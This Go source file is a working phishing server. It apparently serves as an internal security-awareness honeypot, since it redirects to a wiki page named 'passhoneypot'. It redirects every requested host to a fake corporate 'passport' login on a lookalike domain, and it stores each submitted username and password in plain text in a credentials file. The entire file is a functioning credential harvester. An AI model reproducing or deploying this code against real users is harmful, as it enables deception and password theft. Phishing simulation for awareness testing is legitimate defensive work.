package main

import (
	"encoding/json"
	"html/template"
	"io"
	"log"
	"net/http"
	"net/url"
	"os"
	"path/filepath"

	"github.com/labstack/echo/v4"
	"github.com/labstack/echo/v4/middleware"
)

const PhishDomain = "yandex-tea.ru"
const PassportDomain = "passport." + PhishDomain
const WikiURL = "https://wiki.yandex-team.ru/security/passhoneypot/"

type (
	Credential struct {
		Username string
		Password string
	}
)

type Template struct {
	templates *template.Template
}

func (t *Template) Render(w io.Writer, name string, data interface{}, c echo.Context) error {
	return t.templates.ExecuteTemplate(w, name, data)
}

func check(err error) {
	if err != nil {
		panic(err)
	}
}

func main() {

	t := &Template{
		templates: template.Must(template.ParseGlob(filepath.Join(os.Getenv("GOPATH"),
			"src/github.yandex-team.ru/a-abakumov/hunter/*.html"))),
	}
	f, err := os.OpenFile("/ephemeral/creds.json", os.O_RDWR|os.O_CREATE|os.O_APPEND, 0666)
	log.SetOutput(f)
	check(err)

	// Passport
	passport := echo.New()

	passport.Use(middleware.Logger())
	passport.Use(middleware.Recover())

	passport.Renderer = t

	passport.GET("/auth", func(c echo.Context) error {
		return c.Render(http.StatusOK, "auth", PassportDomain)
	})
	passport.POST("/auth", func(c echo.Context) error {
		username := c.FormValue("login")
		password := c.FormValue("passwd")
		if username != "" && password != "" {
			credJSON, _ := json.Marshal(Credential{Username: username, Password: password})
			log.Println(string(credJSON))
		}
		return c.Redirect(302, WikiURL)
	})

	// Redirect any HOST to passport
	e := echo.New()

	e.Use(middleware.Logger())
	e.Use(middleware.Recover())

	e.Any("/*", func(c echo.Context) (err error) {
		req := c.Request()
		res := c.Response()
		if req.Host == PassportDomain {
			passport.ServeHTTP(res, req)
		}
		return c.Redirect(http.StatusMovedPermanently,
			"https://"+PassportDomain+"/auth?retpath=http%3A%2F%2F"+url.QueryEscape(req.Host)+"%2F"+url.QueryEscape(req.RequestURI))
	})
	e.Logger.Fatal(e.Start(":80"))
}
